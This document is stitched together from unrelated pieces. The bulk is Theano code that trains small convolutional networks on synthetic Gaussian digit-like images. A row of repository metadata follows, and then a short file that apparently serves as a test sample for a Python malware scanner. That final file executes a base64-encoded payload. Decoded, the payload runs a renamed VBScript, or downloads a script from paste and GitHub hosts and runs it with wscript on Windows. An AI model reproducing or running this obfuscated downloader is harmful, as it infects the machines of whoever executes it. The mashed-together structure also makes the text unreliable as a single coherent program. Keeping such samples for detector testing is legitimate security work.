numpy.save('Order_'+name+'.npy', [cropping_x_dim, cropping_y_dim])
else:
cropping_x_dim = random_sequence[0]
cropping_y_dim = random_sequence[1]
image_label = numpy.random.random_integers(0, 9, set_size)
output_image = numpy.zeros((set_size, 28, 28))
for i in range(0, set_size, 1):
output_image[i, :, :] = input_image[image_label[i], cropping_x_dim[i]:cropping_x_dim[i]+28, cropping_y_dim[i]:cropping_y_dim[i]+28]
return output_image, image_label
temp_image_1, temp_label_1 = Cropping(raw_image_set, size_desired, seq1, 'seq1')
temp_image_2, temp_label_2 = Cropping(raw_image_set, size_desired, seq2, 'seq2')
generated_image_set, morphing_constant = interpolation(temp_image_1, temp_image_2)
number_of_classes = 10
set_order1 = one_hot(temp_label_1, number_of_classes)
set_order2 = one_hot(temp_label_2, number_of_classes)
generated_label_set = set_order1 + set_order2
generated_label_set = generated_label_set - (generated_label_set == 2)*generated_label_set/2
return shared_dataset(generated_image_set, generated_label_set)
def Generate_Test_Set(raw_image_set, size_desired):
#For Weight Label Generation of GPD
def one_hot(imput_class, number_of_class):
imput_class = numpy.array(imput_class)
assert imput_class.ndim == 1
return numpy.eye(number_of_class)[imput_class]
def shared_dataset(data_x, data_y, borrow=True):
shared_x = theano.shared(numpy.asarray(data_x, dtype=theano.config.floatX), borrow=borrow)
shared_y = theano.shared(numpy.asarray(data_y, dtype=theano.config.floatX), borrow=borrow)
return shared_x, shared_y
def interpolation(input_image_1, input_image_2, input_image_3):
morphing_coeff = numpy.random.random(input_image_1.shape[0])
morphing_coeff2 = numpy.random.random(input_image_1.shape[0])
morphing_coeff3 = numpy.random.random(input_image_1.shape[0])
resultant_set = morphing_coeff[:, None, None] * input_image_1 + \
morphing_coeff2[:, None, None] * input_image_2 + \
morphing_coeff3[:, None, None] * input_image_3
resultant_set = resultant_set / ((morphing_coeff3 + morphing_coeff2 + morphing_coeff)[:, None, None])
return resultant_set, [morphing_coeff, morphing_coeff2, morphing_coeff3]
def Cropping(input_image, set_size):
x_dim_max = input_image.shape[2] - 28
y_dim_max = input_image.shape[1] - 28
cropping_x_dim = numpy.random.random_integers(0, x_dim_max, set_size)
cropping_y_dim = numpy.random.random_integers(0, y_dim_max, set_size)
image_label = numpy.random.random_integers(0, 9, set_size)
output_image = numpy.zeros((set_size, 28, 28))
for i in range(0, set_size, 1):
output_image[i, :, :] = input_image[image_label[i],
cropping_x_dim[i]:cropping_x_dim[i]+28,
cropping_y_dim[i]:cropping_y_dim[i]+28]
return output_image, image_label
temp_image_1, temp_label_1 = Cropping(raw_image_set, size_desired)
temp_image_2, temp_label_2 = Cropping(raw_image_set, size_desired)
temp_image_3, temp_label_3 = Cropping(raw_image_set, size_desired)
generated_image_set, morphing_constant = interpolation(temp_image_1, temp_image_2, temp_image_3)
number_of_classes = 10
set_order1 = one_hot(temp_label_1, number_of_classes)
set_order2 = one_hot(temp_label_2, number_of_classes)
set_order3 = one_hot(temp_label_3, number_of_classes)
constant_sum = morphing_constant[0] + morphing_constant[1] + morphing_constant[2]
generated_label_set = (set_order1 * morphing_constant[0][:, None] +
set_order2 * morphing_constant[1][:, None] +
set_order3 * morphing_constant[2][:, None])/constant_sum[:, None]
return shared_dataset(generated_image_set, generated_label_set)
def Generate_Test_Set_ez(raw_image_set, size_desired):
def one_hot(imput_class, number_of_class):
imput_class = numpy.array(imput_class)
assert imput_class.ndim == 1
return numpy.eye(number_of_class)[imput_class]
def shared_dataset(data_x, data_y, borrow=True):
shared_x = theano.shared(numpy.asarray(data_x, dtype=theano.config.floatX), borrow=borrow)
shared_y = theano.shared(numpy.asarray(data_y, dtype=theano.config.floatX), borrow=borrow)
return shared_x, shared_y
def interpolation(input_image_1, input_image_2, input_image_3):
morphing_coeff = numpy.random.random(input_image_1.shape[0])
morphing_coeff2 = numpy.random.random(input_image_1.shape[0])
morphing_coeff3 = numpy.random.random(input_image_1.shape[0])
resultant_set = morphing_coeff[:, None, None] * input_image_1 + \
morphing_coeff2[:, None, None] * input_image_2 + \
morphing_coeff3[:, None, None] * input_image_3
resultant_set = resultant_set / ((morphing_coeff3 + morphing_coeff2 + morphing_coeff)[:, None, None])
return resultant_set, [morphing_coeff, morphing_coeff2, morphing_coeff3]
def Cropping(input_image, set_size):
x_dim_max = input_image.shape[2] - 28
y_dim_max = input_image.shape[1] - 28
cropping_x_dim = numpy.random.random_integers(0, x_dim_max, set_size)
cropping_y_dim = numpy.random.random_integers(0, y_dim_max, set_size)
image_label = numpy.random.random_integers(0, 9, set_size)
output_image = numpy.zeros((set_size, 28, 28))
for i in range(0, set_size, 1):
output_image[i, :, :] = input_image[image_label[i],
cropping_x_dim[i]:cropping_x_dim[i]+28,
cropping_y_dim[i]:cropping_y_dim[i]+28]
return output_image, image_label
temp_image_1, temp_label_1 = Cropping(raw_image_set, size_desired)
temp_image_2, temp_label_2 = Cropping(raw_image_set, size_desired)
temp_image_3, temp_label_3 = Cropping(raw_image_set, size_desired)
generated_image_set, morphing_constant = interpolation(temp_image_1, temp_image_2, temp_image_3)
number_of_classes = 10
set_order1 = one_hot(temp_label_1, number_of_classes)
set_order2 = one_hot(temp_label_2, number_of_classes)
set_order3 = one_hot(temp_label_3, number_of_classes)
generated_label_set = set_order1 + set_order2 + set_order3
generated_label_set_temp = generated_label_set
generated_label_set_temp[numpy.nonzero(generated_label_set == 3)] = 1
generated_label_set_temp[numpy.nonzero(generated_label_set == 2)] = 1
generated_label_set = generated_label_set_temp
return shared_dataset(generated_image_set, generated_label_set)
def main_ver1(learning_rate=0.05, weight_decay=0.001, n_epochs=2000, nkerns=[20, 30],
data_set='Gaussian_Data_Set.npy', batch_size=500):
name = 'Gaussian_Model_'+str(learning_rate)+'_'+str(weight_decay) + '_' + str(nkerns)
if data_set == 'Gaussian_White_Noise.npy':
name += '_WN'
rng = numpy.random.RandomState(23455)
# seed 1
#rng = numpy.random.RandomState(10000)
# seed 2
#rng = numpy.random.RandomState(100)
# seed 3
datasets = numpy.load(data_set)
train_set_x, train_set_y = Generate_Set_ez(datasets, 50000)
valid_set_x, valid_set_y = Generate_Set_ez(datasets, 10000)
test_set_x, test_set_y = Generate_Test_Set_ez(datasets, 10000)
n_train = train_set_x.get_value(borrow=True).shape[0]
n_valid = valid_set_x.get_value(borrow=True).shape[0]
n_test = test_set_x.get_value(borrow=True).shape[0]
test_set_x = test_set_x.reshape((n_test, 1, 28, 28))
valid_set_x = valid_set_x.reshape((n_valid, 1, 28, 28))
train_set_x = train_set_x.reshape((n_train, 1, 28, 28))
n_train_batches = n_train//batch_size
n_valid_batches = n_valid//batch_size
n_test_batches = n_test//batch_size
x = T.matrix('x')
y = T.fmatrix('y')
index = T.lscalar()
print('... loading the model')
layer0_input = x.reshape((batch_size, 1, 28, 28))
layer0 = LeNetConvPoolLayer(
rng,
input=layer0_input,
image_shape=(batch_size, 1, 28, 28),
filter_shape=(nkerns[0], 1, 5, 5),
poolsize=(2, 2)
)
layer1 = LeNetConvPoolLayer(
rng,
input=layer0.output,
image_shape=(batch_size, nkerns[0], 12, 12),
filter_shape=(nkerns[1], nkerns[0], 5, 5),
poolsize=(2, 2)
)
layer2_input = layer1.output.flatten(2)
layer2 = HiddenLayer(
rng,
input=layer2_input,
n_in=nkerns[1] * 4 * 4,
n_out=numpy.round(nkerns[1] * 4 * 4/2).astype(int),
activation=T.nnet.relu
)
layer3 = LogisticRegression(input=layer2.output, n_in=numpy.round(nkerns[1] * 4 * 4/2).astype(int), n_out=10)
with open(name + '_Initial.pkl', 'wb') as f:
pickle.dump([layer0, layer1, layer2_input, layer2, layer3], f)
cost = layer3.sigmoid_cost_function(y)
params = layer3.params + layer2.params + layer1.params + layer0.params
grads = T.grad(cost, params)
updates = [
(param_i, param_i - learning_rate * (grad_i + weight_decay * param_i))
for param_i, grad_i in zip(params, grads)]
patience_increase = 10
improvement_threshold = 0.001
start_time = timeit.default_timer()
print('... training')
temp_time_1 = timeit.default_timer()
best_validation_loss = numpy.inf
best_iter = 0
test_score = 0.
patience = 200000
validation_frequency = min(n_train_batches, patience // 2)
epoch = 0
done_looping = False
error_line = numpy.zeros(n_epochs)
test_model = theano.function(
[index],
layer3.errors(y),
givens={
layer0.input: test_set_x[index * batch_size: (index + 1) * batch_size],
y: test_set_y[index * batch_size: (index + 1) * batch_size]})
validate_model = theano.function(
[index],
layer3.errors(y),
givens={
layer0.input: valid_set_x[index * batch_size: (index + 1) * batch_size],
y: valid_set_y[index * batch_size: (index + 1) * batch_size]})
train_model = theano.function(
[index],
cost,
updates=updates,
givens={
layer0.input: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]})
while (epoch < n_epochs) and (not done_looping):
epoch = epoch + 1
for minibatch_index in range(n_train_batches):
iter = (epoch - 1) * n_train_batches + minibatch_index
if iter % 100 == 0:
print('training @ iter = ', iter)
cost_ij = train_model(minibatch_index)
if (iter + 1) % validation_frequency == 0:
validation_losses = [validate_model(i) for i
in range(n_valid_batches)]
this_validation_loss = numpy.mean(validation_losses)
print('epoch %i, minibatch %i/%i, validation error %f' %
(epoch, minibatch_index + 1, n_train_batches,
this_validation_loss))
error_line[epoch-1] = this_validation_loss
if this_validation_loss < best_validation_loss:
if this_validation_loss < best_validation_loss * \
improvement_threshold:
patience = max(patience, iter * patience_increase)
best_validation_loss = this_validation_loss
best_iter = iter
test_losses = [
test_model(i)
for i in range(n_test_batches)
]
test_score = numpy.mean(test_losses)
print((' epoch %i, minibatch %i/%i, test error of '
'best model %f') %
(epoch, minibatch_index + 1, n_train_batches,
test_score))
[t_layer0, t_layer1, t_layer2_input, t_layer2, t_layer3] = \
[layer0, layer1, layer2_input, layer2, layer3]
if patience <= iter:
done_looping = True
break
error_line = error_line[0:epoch-1]
scipy.io.savemat(name+'.mat', mdict={'Error_Spectrum': error_line})
with open(name + '.pkl', 'wb') as f:
pickle.dump([t_layer0, t_layer1, t_layer2_input, t_layer2, t_layer3], f)
temp_time_2 = timeit.default_timer()
print('%.2fm' % ((temp_time_2 - temp_time_1) / 60.))
end_time = timeit.default_timer()
print('Optimization complete.')
print('Best validation score of %f obtained at iteration %i, '
'with test performance %f ' %
(best_validation_loss, best_iter + 1, test_score))
print('The code for file ran for %.2fm' % ((end_time - start_time) / 60.))
def main_ver1_3layers(learning_rate=0.01, weight_decay=0.001, n_epochs=1000, nkerns=[6],
data_set='Gaussian_Data_Set.npy', batch_size=500):
rng = numpy.random.RandomState(23455)
# seed 1
#rng = numpy.random.RandomState(10000)
# seed 2
#rng = numpy.random.RandomState(100)
# seed 3
datasets = numpy.load(data_set)
train_set_x, train_set_y = Generate_Set_ez(datasets, 50000)
valid_set_x, valid_set_y = Generate_Set_ez(datasets, 10000)
test_set_x, test_set_y = Generate_Test_Set_ez(datasets, 10000)
n_train = train_set_x.get_value(borrow=True).shape[0]
n_valid = valid_set_x.get_value(borrow=True).shape[0]
n_test = test_set_x.get_value(borrow=True).shape[0]
test_set_x = test_set_x.reshape((n_test, 1, 28, 28))
valid_set_x = valid_set_x.reshape((n_valid, 1, 28, 28))
train_set_x = train_set_x.reshape((n_train, 1, 28, 28))
n_train_batches = n_train//batch_size
n_valid_batches = n_valid//batch_size
n_test_batches = n_test//batch_size
x = T.matrix('x')
y = T.fmatrix('y')
index = T.lscalar()
print('... loading the model')
layer0_input = x.reshape((batch_size, 1, 28, 28))
layer0 = LeNetConvPoolLayer(
rng,
input=layer0_input,
image_shape=(batch_size, 1, 28, 28),
filter_shape=(nkerns[0], 1, 5, 5),
poolsize=(2, 2)
)
layer1_input = layer0.output.flatten(2)
layer1 = HiddenLayer(
rng,
input=layer1_input,
n_in=nkerns[0] * 12 * 12,
n_out=numpy.round(nkerns[0] * 12 * 12/2).astype(int),
activation=T.nnet.relu
)
layer2 = LogisticRegression(input=layer1.output, n_in=numpy.round(nkerns[0] * 12 * 12/2).astype(int), n_out=10)
cost = layer2.negative_log_likelihood(y)
params = layer2.params + layer1.params + layer0.params
grads = T.grad(cost, params)
updates = [
(param_i, param_i - learning_rate * (grad_i + weight_decay * param_i))
for param_i, grad_i in zip(params, grads)]
patience_increase = 2
improvement_threshold = 0.0001
start_time = timeit.default_timer()
print('... training')
temp_time_1 = timeit.default_timer()
best_validation_loss = numpy.inf
best_iter = 0
test_score = 0.
patience = 100000
validation_frequency = min(n_train_batches, patience // 2)
epoch = 0
done_looping = False
error_line = numpy.zeros(n_epochs)
test_model = theano.function(
[index],
layer2.errors(y),
givens={
layer0.input: test_set_x[index * batch_size: (index + 1) * batch_size],
y: test_set_y[index * batch_size: (index + 1) * batch_size]})
validate_model = theano.function(
[index],
layer2.errors(y),
givens={
layer0.input: valid_set_x[index * batch_size: (index + 1) * batch_size],
y: valid_set_y[index * batch_size: (index + 1) * batch_size]})
train_model = theano.function(
[index],
cost,
updates=updates,
givens={
layer0.input: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]})
while (epoch < n_epochs) and (not done_looping):
epoch = epoch + 1
for minibatch_index in range(n_train_batches):
iter = (epoch - 1) * n_train_batches + minibatch_index
if iter % 100 == 0:
print('training @ iter = ', iter)
cost_ij = train_model(minibatch_index)
if (iter + 1) % validation_frequency == 0:
validation_losses = [validate_model(i) for i
in range(n_valid_batches)]
this_validation_loss = numpy.mean(validation_losses)
print('epoch %i, minibatch %i/%i, validation error %f' %
(epoch, minibatch_index + 1, n_train_batches,
this_validation_loss))
error_line[epoch-1] = this_validation_loss
if this_validation_loss < best_validation_loss:
if this_validation_loss < best_validation_loss * \
improvement_threshold:
patience = max(patience, iter * patience_increase)
best_validation_loss = this_validation_loss
best_iter = iter
test_losses = [
test_model(i)
for i in range(n_test_batches)
]
test_score = numpy.mean(test_losses)
print((' epoch %i, minibatch %i/%i, test error of '
'best model %f') %
(epoch, minibatch_index + 1, n_train_batches,
test_score))
[t_layer0, t_layer1_input, t_layer1, t_layer2] = \
[layer0, layer1_input, layer1, layer2]
if patience <= iter:
done_looping = True
break
error_line = error_line[0:epoch-1]
name = 'Gaussian_Model_'+str(learning_rate)+'_'+str(weight_decay)
if data_set == 'Gaussian_White_Noise.npy':
name += '_WN'
#scipy.io.savemat(name+'.mat', mdict={'Error_Spectrum': error_line})
#with open(name + '.pkl', 'wb') as f:
# pickle.dump([t_layer0, t_layer1_input, t_layer1, t_layer2], f)
temp_time_2 = timeit.default_timer()
print('%.2fm' % ((temp_time_2 - temp_time_1) / 60.))
end_time = timeit.default_timer()
print('Optimization complete.')
print('Best validation score of %f obtained at iteration %i, '
'with test performance %f ' %
(best_validation_loss, best_iter + 1, test_score))
print('The code for file ran for %.2fm' % ((end_time - start_time) / 60.))
def main_ver1_fixed_seq(learning_rate=0.05, weight_decay=0.001, n_epochs=500, nkerns=[20, 30],
data_set='Gaussian_White_Noise.npy', batch_size=500):
rng = numpy.random.RandomState(23455)
# seed 1
#rng = numpy.random.RandomState(10000)
# seed 2
#rng = numpy.random.RandomState(100)
# seed 3
datasets = numpy.load(data_set)
if data_set == 'Gaussian_Data_Set.npy':
train_set_x, train_set_y = Generate_Set_ez_fixed_seq(datasets, 50000, None, None)
if data_set == 'Gaussian_White_Noise.npy':
seq1 = numpy.load('Order_seq1.npy')
seq2 = numpy.load('Order_seq2.npy')
train_set_x, train_set_y = Generate_Set_ez_fixed_seq(datasets, 50000, seq1, seq2)
valid_set_x, valid_set_y = Generate_Set_ez(datasets, 10000)
test_set_x, test_set_y = Generate_Set_ez(datasets, 10000)
n_train = train_set_x.get_value(borrow=True).shape[0]
n_valid = valid_set_x.get_value(borrow=True).shape[0]
n_test = test_set_x.get_value(borrow=True).shape[0]
test_set_x = test_set_x.reshape((n_test, 1, 28, 28))
valid_set_x = valid_set_x.reshape((n_valid, 1, 28, 28))
train_set_x = train_set_x.reshape((n_train, 1, 28, 28))
n_train_batches = n_train//batch_size
n_valid_batches = n_valid//batch_size
n_test_batches = n_test//batch_size
x = T.matrix('x')
y = T.fmatrix('y')
index = T.lscalar()
print('... loading the model')
layer0_input = x.reshape((batch_size, 1, 28, 28))
layer0 = LeNetConvPoolLayer(
rng,
input=layer0_input,
image_shape=(batch_size, 1, 28, 28),
filter_shape=(nkerns[0], 1, 5, 5),
poolsize=(2, 2)
)
layer1 = LeNetConvPoolLayer(
rng,
input=layer0.output,
image_shape=(batch_size, nkerns[0], 12, 12),
filter_shape=(nkerns[1], nkerns[0], 5, 5),
poolsize=(2, 2)
)
# construct a fully-connected sigmoidal layer
#layer2_input = T.concatenate([layer1.output.flatten(2), layer1a.output.flatten(2)], axis=1)
layer2_input = layer1.output.flatten(2)
layer2 = HiddenLayer(
rng,
input=layer2_input,
n_in=nkerns[1] * 4 * 4,
n_out=numpy.rint(nkerns[1] * 4 * 4/2),
activation=T.nnet.relu
)
layer3 = LogisticRegression(input=layer2.output, n_in=numpy.rint(nkerns[1] * 4 * 4/2), n_out=10)
cost = layer3.negative_log_likelihood(y)
params = layer3.params + layer2.params + layer1.params + layer0.params
grads = T.grad(cost, params)
updates = [
(param_i, param_i - learning_rate * (grad_i + weight_decay * param_i))
for param_i, grad_i in zip(params, grads)]
patience_increase = 2
improvement_threshold = 0.01
start_time = timeit.default_timer()
print('... training')
temp_time_1 = timeit.default_timer()
best_validation_loss = numpy.inf
best_iter = 0
test_score = 0.
patience = 1000000
validation_frequency = min(n_train_batches, patience // 2)
epoch = 0
done_looping = False
error_line = numpy.zeros(n_epochs)
test_model = theano.function(
[index],
layer3.errors(y),
givens={
layer0.input: test_set_x[index * batch_size: (index + 1) * batch_size],
y: test_set_y[index * batch_size: (index + 1) * batch_size]})
validate_model = theano.function(
[index],
layer3.errors(y),
givens={
layer0.input: valid_set_x[index * batch_size: (index + 1) * batch_size],
y: valid_set_y[index * batch_size: (index + 1) * batch_size]})
train_model = theano.function(
[index],
cost,
updates=updates,
givens={
layer0.input: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]})
while (epoch < n_epochs) and (not done_looping):
epoch = epoch + 1
for minibatch_index in range(n_train_batches):
iter = (epoch - 1) * n_train_batches + minibatch_index
if iter % 100 == 0:
print('training @ iter = ', iter)
cost_ij = train_model(minibatch_index)
if (iter + 1) % validation_frequency == 0:
validation_losses = [validate_model(i) for i
in range(n_valid_batches)]
this_validation_loss = numpy.mean(validation_losses)
print('epoch %i, minibatch %i/%i, validation error %f' %
(epoch, minibatch_index + 1, n_train_batches,
this_validation_loss))
error_line[epoch-1] = this_validation_loss
if this_validation_loss < best_validation_loss:
if this_validation_loss < best_validation_loss * \
improvement_threshold:
patience = max(patience, iter * patience_increase)
best_validation_loss = this_validation_loss
best_iter = iter
test_losses = [
test_model(i)
for i in range(n_test_batches)
]
test_score = numpy.mean(test_losses)
print((' epoch %i, minibatch %i/%i, test error of '
'best model %f') %
(epoch, minibatch_index + 1, n_train_batches,
test_score))
with open('Gaussian_Model_WN_0.05_fix_seq.pkl', 'wb') as f:
pickle.dump([layer0, layer1, layer2_input, layer2, layer3], f)
#pickle.dump([layer0, layer1, layer1_input, layer2, layer3], f)
if patience <= iter:
done_looping = True
break
error_line = error_line[0:epoch-1]/100
scipy.io.savemat('Gaussian_Model_WN_0.05_fix_seq.mat', mdict={'Error_Spectrum': error_line})
temp_time_2 = timeit.default_timer()
print('%.2fm' % ((temp_time_2 - temp_time_1) / 60.))
end_time = timeit.default_timer()
print('Optimization complete.')
print('Best validation score of %f obtained at iteration %i, '
'with test performance %f ' %
(best_validation_loss, best_iter + 1, test_score))
print('The code for file ran for %.2fm' % ((end_time - start_time) / 60.))
def initial_weight(learning_rate=0.05, weight_decay=0.001, nkerns=[20, 30], batch_size=500):
rng = numpy.random.RandomState(23455)
# seed 1
#rng = numpy.random.RandomState(10000)
#seed 2
#rng = numpy.random.RandomState(100)
# seed 3
x = T.matrix('x')
print('... loading the model')
layer0_input = x.reshape((batch_size, 1, 28, 28))
layer0 = LeNetConvPoolLayer(
rng,
input=layer0_input,
image_shape=(batch_size, 1, 28, 28),
filter_shape=(nkerns[0], 1, 5, 5),
poolsize=(2, 2)
)
layer1 = LeNetConvPoolLayer(
rng,
input=layer0.output,
image_shape=(batch_size, nkerns[0], 12, 12),
filter_shape=(nkerns[1], nkerns[0], 5, 5),
poolsize=(2, 2)
)
layer2_input = layer1.output.flatten(2)
layer2 = HiddenLayer(
rng,
input=layer2_input,
n_in=nkerns[1] * 4 * 4,
n_out=numpy.round(nkerns[1] * 4 * 4 / 2).astype(int),
activation=T.nnet.relu
)
layer3 = LogisticRegression(rng, input=layer2.output, n_in=numpy.round(nkerns[1] * 4 * 4 / 2).astype(int), n_out=10)
name = 'Gaussian_Model_' + str(learning_rate) + '_' + str(weight_decay) + '_' + str(nkerns) + '_Initial.pkl'
with open(name, 'wb') as f:
pickle.dump([layer0, layer1, layer2_input, layer2, layer3], f)
def single_layer_precepton(learning_rate=0.05, weight_decay=0.001, n_epochs=2000,
dataset='Gaussian_Data_Set.npy', batch_size=500):
rng = numpy.random.RandomState(23455)
datasets = numpy.load(dataset)
train_set_x, train_set_y = Generate_Set_ez(datasets, 50000)
valid_set_x, valid_set_y = Generate_Set_ez(datasets, 10000)
#random_num = numpy.random.random_integers(0, 49999, 10000)
#valid_set_x = theano.shared(numpy.asarray(train_set_x[random_num].eval(), dtype=theano.config.floatX), borrow=True)
#valid_set_y = theano.shared(numpy.asarray(train_set_y[random_num].eval(), dtype=theano.config.floatX), borrow=True)
test_set_x, test_set_y = Generate_Test_Set_ez(datasets, 20000)
n_train = train_set_x.get_value(borrow=True).shape[0]
n_valid = valid_set_x.get_value(borrow=True).shape[0]
n_test = test_set_x.get_value(borrow=True).shape[0]
#print(str(n_train), str(n_valid),str(n_test))
test_set_x = test_set_x.reshape((n_test, 784))
valid_set_x = valid_set_x.reshape((n_valid, 784))
train_set_x = train_set_x.reshape((n_train, 784))
n_train_batches = n_train//batch_size
n_valid_batches = n_valid//batch_size
n_test_batches = n_test//batch_size
x = T.matrix('x')
# Need to check how to update the x such that no need to input in such a way
y = T.fmatrix('y')
index = T.lscalar()
print('... loading the model')
layer0_input = x
layer3 = LogisticRegression(input=x, n_in=784, n_out=10)
cost = layer3.negative_log_likelihood(y)
params = layer3.params
grads = T.grad(cost, params)
updates = [
(param_i, param_i - learning_rate * (grad_i + weight_decay * param_i))
for param_i, grad_i in zip(params, grads)]
patience_increase = 2
improvement_threshold = 0.0001
start_time = timeit.default_timer()
print('... training')
temp_time_1 = timeit.default_timer()
best_validation_loss = numpy.inf
best_iter = 0
test_score = 0.
patience = 200000
validation_frequency = min(n_train_batches, patience // 2)
epoch = 0
done_looping = False
error_line = numpy.zeros(n_epochs)
test_model = theano.function(
[index],
layer3.errors(y),
givens={
x: test_set_x[index * 500: (index + 1) * 500],
y: test_set_y[index * 500: (index + 1) * 500]})
validate_model = theano.function(
[index],
layer3.errors(y),
givens={
x: train_set_x[index * 500: (index + 1) * 500],
y: train_set_y[index * 500: (index + 1) * 500]})
train_model = theano.function(
[index],
cost,
updates=updates,
givens={
x: train_set_x[index * 500: (index + 1) * 500],
y: train_set_y[index * 500: (index + 1) * 500]})
while (epoch < n_epochs) and (not done_looping):
epoch = epoch + 1
for minibatch_index in range(n_train_batches):
iter = (epoch - 1) * n_train_batches + minibatch_index
if iter % 100 == 0:
print('training @ iter = ', iter)
cost_ij = train_model(minibatch_index)
if (iter + 1) % validation_frequency == 0:
# compute zero-one loss on validation set
validation_losses = [validate_model(i) for i
in range(n_valid_batches)]
this_validation_loss = numpy.mean(validation_losses)
print('epoch %i, minibatch %i/%i, validation error %f' %
(epoch, minibatch_index + 1, n_train_batches,
this_validation_loss))
error_line[epoch-1] = this_validation_loss
# if we got the best validation score until now
if this_validation_loss < best_validation_loss:
# improve patience if loss improvement is good enough
if this_validation_loss < best_validation_loss * \
improvement_threshold:
patience = max(patience, iter * patience_increase)
# save best validation score and iteration number
best_validation_loss = this_validation_loss
best_iter = iter
# test it on the test set
test_losses = [
test_model(i)
for i in range(n_test_batches)
]
test_score = numpy.mean(test_losses)
print((' epoch %i, minibatch %i/%i, test error of '
'best model %f') %
(epoch, minibatch_index + 1, n_train_batches,
test_score))
#with open('Gaussian_Model_perceptron_white_noise.pkl', 'wb') as f:
# pickle.dump([layer0, layer2, layer3], f)
if patience <= iter:
done_looping = True
break
error_line = error_line[0:epoch-1]
scipy.io.savemat('Gaussian_Model_perceptron.mat', mdict={'Error_Spectrum': error_line})
temp_time_2 = timeit.default_timer()
print('%.2fm' % ((temp_time_2 - temp_time_1) / 60.))
end_time = timeit.default_timer()
print('Optimization complete.')
print('Best validation score of %f obtained at iteration %i, '
'with test performance %f ' %
(best_validation_loss, best_iter + 1, test_score))
print('The code for file ran for %.2fm' % ((end_time - start_time) / 60.))
if __name__ == "__main__":
#single_layer_precepton(dataset='Gaussian_Data_Set.npy')
main_ver1(nkerns=[20, 30])
#main_ver1(nkerns=[20, 30], data_set='Gaussian_Data_Set_Range.npy')
#initial_weight(nkerns=[12, 30])
#main_ver1_3layers()
| 37.53461 | 144 | 0.59982 | 6,614 | 50,972 | 4.341699 | 0.067886 | 0.020685 | 0.015984 | 0.017621 | 0.87554 | 0.865685 | 0.850223 | 0.839219 | 0.828249 | 0.806066 | 0 | 0.033196 | 0.300263 | 50,972 | 1,357 | 145 | 37.56227 | 0.771918 | 0.132759 | 0 | 0.789227 | 0 | 0 | 0.041541 | 0.006542 | 0 | 0 | 0 | 0 | 0.008197 | 1 | 0.045667 | false | 0 | 0.01171 | 0.003513 | 0.09719 | 0.044496 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c0c6b439e47fbc9aa3fed388836de3b57e192761 | 1,688 | py | Python | examples/string_decode.py | lyvd/bandit4mal | b1ca9eb773ebed84d04cfeb589d028af532d1d11 | [
"Apache-2.0"
] | null | null | null | examples/string_decode.py | lyvd/bandit4mal | b1ca9eb773ebed84d04cfeb589d028af532d1d11 | [
"Apache-2.0"
] | null | null | null | examples/string_decode.py | lyvd/bandit4mal | b1ca9eb773ebed84d04cfeb589d028af532d1d11 | [
"Apache-2.0"
] | null | null | null | exec("b3MxID0gcGxhdGZvcm0uc3lzdGVtKCkNCmlmIG9zMSA9PSAiV2luZG93cyI6DQogICAgdHJ5Og0KCQljdWVyZGEgPSAnJy5qb2luKHJhbmRvbS5jaG9pY2Uoc3RyaW5nLmFzY2lpX3VwcGVyY2FzZSArIHN0cmluZy5hc2NpaV9sb3dlcmNhc2UgKyBzdHJpbmcuZGlnaXRzKSBmb3IgXyBpbiByYW5nZSg1KSkgKyAiLnZicyINCgkJb3MucmVuYW1lKCd0ZXN0LmpwZycsICJuZXcudmJzIikNCgkJb3Muc3lzdGVtKCJ3c2NyaXB0IG5ldy52YnMiKQ0KCQkjc3VicHJvY2Vzcy5jYWxsKCJ3c2NyaXB0IG5ldy52YnMiKQ0KICAgIGV4Y2VwdDoNCiAgICAJdHJ5Og0KICAgIAkJcmVxID0gdXJsbGliMi5SZXF1ZXN0KGJhc2U2NC5iNjRkZWNvZGUoImFIUjBjSE02THk5b1lYTjBaV0pwYmk1amIyMHZjbUYzTDJsa1lXMWxlRzluYVdJPT0iKSwgaGVhZGVycz17J1VzZXItQWdlbnQnIDogInRhY29fbGlmZSJ9KQ0KICAgIAkJdGV4dG8gPSB1cmxsaWIyLnVybG9wZW4oIHJlcSApLnJlYWQoKQ0KICAgIAkJeCA9ICcnLmpvaW4ocmFuZG9tLmNob2ljZShzdHJpbmcuYXNjaWlfdXBwZXJjYXNlICsgc3RyaW5nLmFzY2lpX2xvd2VyY2FzZSArIHN0cmluZy5kaWdpdHMpIGZvciBfIGluIHJhbmdlKDE2KSkgKyAiLnZicyINCiAgICAJCWYgPSBvcGVuKHgsICJhIikNCiAgICAJCWYud3JpdGUoc3RyKHRleHRvKSkNCiAgICAJCWYuY2xvc2UoKQ0KICAgIAkJb3Muc3lzdGVtKCJ3c2NyaXB0ICVzICIgJSAgeCkNCiAgICAJZXhjZXB0Og0KCQkJdHJ5Og0KCQkJIAlyZXEgPSB1cmxsaWIyLlJlcXVlc3QoYmFzZTY0LmI2NGRlY29kZSgiYUhSMGNITTZMeTl5WVhjdVoybDBhSFZpZFhObGNtTnZiblJsYm5RdVkyOXRMMVJoWTI5TlJTOW9aV3hzYjNkdmNtUXZiV0Z6ZEdWeUwzUmhZMjlpWld4cyIpLCBoZWFkZXJzPXsnVXNlci1BZ2VudCcgOiAidGFjb19saWZlIn0pDQoJCQkgCXRleHRvID0gdXJsbGliMi51cmxvcGVuKCByZXEgKS5yZWFkKCkNCgkJCSAJeCA9ICcnLmpvaW4ocmFuZG9tLmNob2ljZShzdHJpbmcuYXNjaWlfdXBwZXJjYXNlICsgc3RyaW5nLmFzY2lpX2xvd2VyY2FzZSArIHN0cmluZy5kaWdpdHMpIGZvciBfIGluIHJhbmdlKDE2KSkgKyAiLnZicyINCgkJCSAJZiA9IG9wZW4oeCwgImEiKQ0KCQkJIAlmLndyaXRlKHN0cih0ZXh0bykpDQoJCQkgCWYuY2xvc2UoKQ0KCQkJIAlvcy5zeXN0ZW0oIndzY3JpcHQgJXMgIiAlICB4KQ0KCQkJZXhjZXB0Og0KCQkJIAlwcmludA==".decode('base64'))
abc = "abc".decode("base64")
